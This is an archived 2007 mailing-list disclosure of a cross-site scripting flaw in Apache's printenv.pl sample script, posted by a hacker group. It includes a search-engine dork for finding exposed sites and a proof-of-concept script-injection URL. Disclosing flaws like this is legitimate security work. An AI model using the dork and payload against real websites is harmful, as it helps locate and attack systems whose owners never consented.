Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PR07-21: Webbler CMS forms are susceptible to spamming and phishing abuses

PR07-20: Webroot disclosure on Webbler CMS

PR07-19: Cross-site Scripting (XSS) / HTML injection on Webbler CMS admin login page (2)

PR07-18: Cross-site Scripting (XSS) / HTML injection on Webbler CMS admin login page (1)

From:	hadihadi_zedehal_2006_(at)_yahoo.com <hadihadi_zedehal_2006_(at)_yahoo.com>
Date:	24.07.2007
Subject:	printenv.pl(all versions) cross site scripting Vulnerability

################################################################################

#...:::::printenv.pl(all versions) cross site scripting Vulnerability::::....  #
################################################################################

Virangar Security Team

www.virangar.org

--------
Discoverd By : hadihadi & black.shadowes

special tnx to:MR.nosrati,MR.hesy,satan,IGI,zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
-----------------------------------
dork:  inurl:/cgi-bin/printenv.pl
-----------------------------------
vlu:
http://www.site.com/cgi-bin/printenv.pl?acuparam=>"><ScRiPt>aler
t('xss')</ScRiPt>.

-------------------------------------
it's better using IE for test xss vlu
-------------------------------------
coment:

when y0u Installing and configuring Apache  or install a local host on your pc
in the cgi-bin folder there is a perl program called printenv.pl
which you can use to test if your Perl installation is working in combination with the Apache HTTP server.
---
i dont know who vendor the printenv.pl